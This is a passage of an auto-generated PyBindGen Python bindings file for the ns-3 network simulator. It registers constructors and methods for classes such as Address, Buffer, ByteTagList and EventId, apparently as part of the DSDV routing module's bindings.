    register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
    register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
    register_Ns3Ipv4MulticastRoute_methods(root_module, root_module['ns3::Ipv4MulticastRoute'])
    register_Ns3Ipv4Route_methods(root_module, root_module['ns3::Ipv4Route'])
    register_Ns3Ipv4RoutingProtocol_methods(root_module, root_module['ns3::Ipv4RoutingProtocol'])
    register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
    register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
    register_Ns3Ipv6Interface_methods(root_module, root_module['ns3::Ipv6Interface'])
    register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
    register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
    register_Ns3LogNormalRandomVariable_methods(root_module, root_module['ns3::LogNormalRandomVariable'])
    register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
    register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
    register_Ns3Node_methods(root_module, root_module['ns3::Node'])
    register_Ns3NormalRandomVariable_methods(root_module, root_module['ns3::NormalRandomVariable'])
    register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
    register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
    register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper'])
    register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
    register_Ns3ParetoRandomVariable_methods(root_module, root_module['ns3::ParetoRandomVariable'])
    register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
    register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
    register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
    register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
    register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
    register_Ns3Ipv4ListRouting_methods(root_module, root_module['ns3::Ipv4ListRouting'])
    register_Ns3HashImplementation_methods(root_module, root_module['ns3::Hash::Implementation'])
    register_Ns3HashFunctionFnv1a_methods(root_module, root_module['ns3::Hash::Function::Fnv1a'])
    register_Ns3HashFunctionHash32_methods(root_module, root_module['ns3::Hash::Function::Hash32'])
    register_Ns3HashFunctionHash64_methods(root_module, root_module['ns3::Hash::Function::Hash64'])
    register_Ns3HashFunctionMurmur3_methods(root_module, root_module['ns3::Hash::Function::Murmur3'])
    register_Ns3DsdvDsdvHeader_methods(root_module, root_module['ns3::dsdv::DsdvHeader'])
    register_Ns3DsdvPacketQueue_methods(root_module, root_module['ns3::dsdv::PacketQueue'])
    register_Ns3DsdvQueueEntry_methods(root_module, root_module['ns3::dsdv::QueueEntry'])
    register_Ns3DsdvRoutingProtocol_methods(root_module, root_module['ns3::dsdv::RoutingProtocol'])
    register_Ns3DsdvRoutingTable_methods(root_module, root_module['ns3::dsdv::RoutingTable'])
    register_Ns3DsdvRoutingTableEntry_methods(root_module, root_module['ns3::dsdv::RoutingTableEntry'])
    return
def register_Ns3Address_methods(root_module, cls):
    """Register bindings for ns3::Address on the wrapped class *cls*.

    Auto-generated by PyBindGen from the ns-3 'network' module's
    address.h; each ``##`` comment below records the C++ declaration
    being wrapped.
    """
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    ## address.h (module 'network'): ns3::Address::Address() [constructor]
    cls.add_constructor([])
    ## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
    cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
    ## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
    cls.add_constructor([param('ns3::Address const &', 'address')])
    ## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
    cls.add_method('CheckCompatible', 
                   'bool', 
                   [param('uint8_t', 'type'), param('uint8_t', 'len')], 
                   is_const=True)
    ## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
    cls.add_method('CopyAllFrom', 
                   'uint32_t', 
                   [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
    ## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
    cls.add_method('CopyAllTo', 
                   'uint32_t', 
                   [param('uint8_t *', 'buffer'), param('uint8_t', 'len')], 
                   is_const=True)
    ## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
    cls.add_method('CopyFrom', 
                   'uint32_t', 
                   [param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
    ## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
    cls.add_method('CopyTo', 
                   'uint32_t', 
                   [param('uint8_t *', 'buffer')], 
                   is_const=True)
    ## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
    cls.add_method('Deserialize', 
                   'void', 
                   [param('ns3::TagBuffer', 'buffer')])
    ## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
    cls.add_method('GetLength', 
                   'uint8_t', 
                   [], 
                   is_const=True)
    ## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 
                   'uint32_t', 
                   [], 
                   is_const=True)
    ## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
    cls.add_method('IsInvalid', 
                   'bool', 
                   [], 
                   is_const=True)
    ## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
    cls.add_method('IsMatchingType', 
                   'bool', 
                   [param('uint8_t', 'type')], 
                   is_const=True)
    ## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
    cls.add_method('Register', 
                   'uint8_t', 
                   [], 
                   is_static=True)
    ## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
    cls.add_method('Serialize', 
                   'void', 
                   [param('ns3::TagBuffer', 'buffer')], 
                   is_const=True)
    return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
    """Register bindings for ns3::AttributeConstructionList on *cls*.

    Auto-generated by PyBindGen from attribute-construction-list.h
    (ns-3 'core' module).
    """
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
    cls.add_constructor([])
    ## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
    cls.add_method('Add', 
                   'void', 
                   [param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
    ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
    cls.add_method('Begin', 
                   'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', 
                   [], 
                   is_const=True)
    ## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
    cls.add_method('End', 
                   'std::_List_const_iterator< ns3::AttributeConstructionList::Item >', 
                   [], 
                   is_const=True)
    ## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('Find', 
                   'ns3::Ptr< ns3::AttributeValue >', 
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], 
                   is_const=True)
    return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
    """Register bindings for ns3::AttributeConstructionList::Item on *cls*.

    Auto-generated by PyBindGen; wraps the Item struct's constructors and
    its three public data members (checker, name, value).
    """
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
    cls.add_constructor([])
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
    cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
    cls.add_instance_attribute('name', 'std::string', is_const=False)
    ## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
    cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
    return
def register_Ns3Buffer_methods(root_module, cls):
    """Register bindings for ns3::Buffer on the wrapped class *cls*.

    Auto-generated by PyBindGen from buffer.h (ns-3 'network' module).
    """
    ## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
    cls.add_constructor([])
    ## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
    cls.add_constructor([param('uint32_t', 'dataSize')])
    ## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
    cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
    ## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
    cls.add_constructor([param('ns3::Buffer const &', 'o')])
    ## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
    cls.add_method('AddAtEnd', 
                   'bool', 
                   [param('uint32_t', 'end')])
    ## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
    cls.add_method('AddAtEnd', 
                   'void', 
                   [param('ns3::Buffer const &', 'o')])
    ## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
    cls.add_method('AddAtStart', 
                   'bool', 
                   [param('uint32_t', 'start')])
    ## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
    cls.add_method('Begin', 
                   'ns3::Buffer::Iterator', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
    cls.add_method('CopyData', 
                   'void', 
                   [param('std::ostream *', 'os'), param('uint32_t', 'size')], 
                   is_const=True)
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
    cls.add_method('CopyData', 
                   'uint32_t', 
                   [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], 
                   is_const=True)
    ## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
    cls.add_method('CreateFragment', 
                   'ns3::Buffer', 
                   [param('uint32_t', 'start'), param('uint32_t', 'length')], 
                   is_const=True)
    ## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
    cls.add_method('CreateFullCopy', 
                   'ns3::Buffer', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
    cls.add_method('Deserialize', 
                   'uint32_t', 
                   [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    ## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
    cls.add_method('End', 
                   'ns3::Buffer::Iterator', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
    cls.add_method('GetCurrentEndOffset', 
                   'int32_t', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
    cls.add_method('GetCurrentStartOffset', 
                   'int32_t', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 
                   'uint32_t', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
    cls.add_method('GetSize', 
                   'uint32_t', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
    cls.add_method('PeekData', 
                   'uint8_t const *', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
    cls.add_method('RemoveAtEnd', 
                   'void', 
                   [param('uint32_t', 'end')])
    ## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
    cls.add_method('RemoveAtStart', 
                   'void', 
                   [param('uint32_t', 'start')])
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
    cls.add_method('Serialize', 
                   'uint32_t', 
                   [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], 
                   is_const=True)
    return
def register_Ns3BufferIterator_methods(root_module, cls):
    """Register bindings for ns3::Buffer::Iterator on *cls*.

    Auto-generated by PyBindGen from buffer.h (ns-3 'network' module);
    wraps the iterator's navigation, checksum, and the Read*/Write*
    accessors in host, network (Hton/Ntoh), and little-endian (Htolsb/
    Lsbtoh) byte orders.
    """
    ## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
    ## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
    cls.add_constructor([])
    ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
    cls.add_method('CalculateIpChecksum', 
                   'uint16_t', 
                   [param('uint16_t', 'size')])
    ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
    cls.add_method('CalculateIpChecksum', 
                   'uint16_t', 
                   [param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
    cls.add_method('GetDistanceFrom', 
                   'uint32_t', 
                   [param('ns3::Buffer::Iterator const &', 'o')], 
                   is_const=True)
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
    cls.add_method('GetSize', 
                   'uint32_t', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
    cls.add_method('IsEnd', 
                   'bool', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
    cls.add_method('IsStart', 
                   'bool', 
                   [], 
                   is_const=True)
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
    cls.add_method('Next', 
                   'void', 
                   [])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
    cls.add_method('Next', 
                   'void', 
                   [param('uint32_t', 'delta')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
    cls.add_method('Prev', 
                   'void', 
                   [])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
    cls.add_method('Prev', 
                   'void', 
                   [param('uint32_t', 'delta')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
    cls.add_method('Read', 
                   'void', 
                   [param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
    ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
    cls.add_method('ReadLsbtohU16', 
                   'uint16_t', 
                   [])
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
    cls.add_method('ReadLsbtohU32', 
                   'uint32_t', 
                   [])
    ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
    cls.add_method('ReadLsbtohU64', 
                   'uint64_t', 
                   [])
    ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
    cls.add_method('ReadNtohU16', 
                   'uint16_t', 
                   [])
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
    cls.add_method('ReadNtohU32', 
                   'uint32_t', 
                   [])
    ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
    cls.add_method('ReadNtohU64', 
                   'uint64_t', 
                   [])
    ## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
    cls.add_method('ReadU16', 
                   'uint16_t', 
                   [])
    ## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
    cls.add_method('ReadU32', 
                   'uint32_t', 
                   [])
    ## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
    cls.add_method('ReadU64', 
                   'uint64_t', 
                   [])
    ## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
    cls.add_method('ReadU8', 
                   'uint8_t', 
                   [])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
    cls.add_method('Write', 
                   'void', 
                   [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
    cls.add_method('Write', 
                   'void', 
                   [param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
    cls.add_method('WriteHtolsbU16', 
                   'void', 
                   [param('uint16_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
    cls.add_method('WriteHtolsbU32', 
                   'void', 
                   [param('uint32_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
    cls.add_method('WriteHtolsbU64', 
                   'void', 
                   [param('uint64_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
    cls.add_method('WriteHtonU16', 
                   'void', 
                   [param('uint16_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
    cls.add_method('WriteHtonU32', 
                   'void', 
                   [param('uint32_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
    cls.add_method('WriteHtonU64', 
                   'void', 
                   [param('uint64_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
    cls.add_method('WriteU16', 
                   'void', 
                   [param('uint16_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
    cls.add_method('WriteU32', 
                   'void', 
                   [param('uint32_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
    cls.add_method('WriteU64', 
                   'void', 
                   [param('uint64_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
    cls.add_method('WriteU8', 
                   'void', 
                   [param('uint8_t', 'data')])
    ## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
    cls.add_method('WriteU8', 
                   'void', 
                   [param('uint8_t', 'data'), param('uint32_t', 'len')])
    return
def register_Ns3ByteTagIterator_methods(root_module, cls):
    """Register ns3::ByteTagIterator constructors and methods on the wrapper *cls*.

    Auto-generated PyBindGen registration: the C++ signature strings must stay
    byte-exact with the scanned ns-3 headers, so edit comments only.
    """
    ## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
    ## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
    cls.add_method('HasNext',
                   'bool',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
    cls.add_method('Next',
                   'ns3::ByteTagIterator::Item',
                   [])
    return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
    """Register ns3::ByteTagIterator::Item bindings (copy ctor plus const accessors) on *cls*."""
    ## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
    ## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
    cls.add_method('GetEnd',
                   'uint32_t',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetStart() const [member function]
    cls.add_method('GetStart',
                   'uint32_t',
                   [],
                   is_const=True)
    ## packet.h (module 'network'): void ns3::ByteTagIterator::Item::GetTag(ns3::Tag & tag) const [member function]
    cls.add_method('GetTag',
                   'void',
                   [param('ns3::Tag &', 'tag')],
                   is_const=True)
    ## packet.h (module 'network'): ns3::TypeId ns3::ByteTagIterator::Item::GetTypeId() const [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True)
    return
def register_Ns3ByteTagList_methods(root_module, cls):
    """Register ns3::ByteTagList bindings (constructors, Add overloads, iteration helpers) on *cls*.

    Note the two 'Add' registrations are distinct C++ overloads; their order
    here follows the generator's header scan and should not be rearranged.
    """
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList() [constructor]
    cls.add_constructor([])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::ByteTagList(ns3::ByteTagList const & o) [copy constructor]
    cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
    ## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
    cls.add_method('Add',
                   'ns3::TagBuffer',
                   [param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
    ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
    cls.add_method('Add',
                   'void',
                   [param('ns3::ByteTagList const &', 'o')])
    ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
    cls.add_method('AddAtEnd',
                   'void',
                   [param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
    ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
    cls.add_method('AddAtStart',
                   'void',
                   [param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
    cls.add_method('Begin',
                   'ns3::ByteTagList::Iterator',
                   [param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
                   is_const=True)
    ## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
    cls.add_method('RemoveAll',
                   'void',
                   [])
    return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
    """Register ns3::ByteTagList::Iterator bindings (copy ctor, HasNext/Next, offset accessor) on *cls*."""
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
    ## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
    cls.add_method('GetOffsetStart',
                   'uint32_t',
                   [],
                   is_const=True)
    ## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
    cls.add_method('HasNext',
                   'bool',
                   [],
                   is_const=True)
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
    cls.add_method('Next',
                   'ns3::ByteTagList::Iterator::Item',
                   [])
    return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
    """Register ns3::ByteTagList::Iterator::Item bindings on *cls*.

    Unlike most wrapped types here, Item exposes public data members, so
    instance attributes are registered alongside the constructors.
    """
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
    cls.add_constructor([param('ns3::TagBuffer', 'buf')])
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
    cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
    cls.add_instance_attribute('end', 'int32_t', is_const=False)
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
    cls.add_instance_attribute('size', 'uint32_t', is_const=False)
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
    cls.add_instance_attribute('start', 'int32_t', is_const=False)
    ## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
    cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
    return
def register_Ns3CallbackBase_methods(root_module, cls):
    """Register ns3::CallbackBase bindings on *cls*.

    The impl-taking constructor and the static Demangle helper are registered
    with visibility='protected', mirroring their C++ access level.
    """
    ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
    ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
    cls.add_constructor([])
    ## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
    cls.add_method('GetImpl',
                   'ns3::Ptr< ns3::CallbackImplBase >',
                   [],
                   is_const=True)
    ## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
                        visibility='protected')
    ## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
    cls.add_method('Demangle',
                   'std::string',
                   [param('std::string const &', 'mangled')],
                   is_static=True, visibility='protected')
    return
def register_Ns3EventId_methods(root_module, cls):
    """Register ns3::EventId bindings on *cls*.

    Comparison operators (!=, ==) are registered first, then constructors and
    the const accessors/state queries of the event handle.
    """
    cls.add_binary_comparison_operator('!=')
    cls.add_binary_comparison_operator('==')
    ## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::EventId const &', 'arg0')])
    ## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
    cls.add_constructor([])
    ## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
    cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
    ## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
    cls.add_method('Cancel',
                   'void',
                   [])
    ## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
    cls.add_method('GetContext',
                   'uint32_t',
                   [],
                   is_const=True)
    ## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
    cls.add_method('GetTs',
                   'uint64_t',
                   [],
                   is_const=True)
    ## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
    cls.add_method('GetUid',
                   'uint32_t',
                   [],
                   is_const=True)
    ## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
    cls.add_method('IsExpired',
                   'bool',
                   [],
                   is_const=True)
    ## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
    cls.add_method('IsRunning',
                   'bool',
                   [],
                   is_const=True)
    ## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
    cls.add_method('PeekEventImpl',
                   'ns3::EventImpl *',
                   [],
                   is_const=True)
    return
def register_Ns3Hasher_methods(root_module, cls):
    """Register ns3::Hasher bindings on *cls*.

    GetHash32/GetHash64 each have two C++ overloads (buffer+size and
    std::string); both are registered under the same Python name.
    """
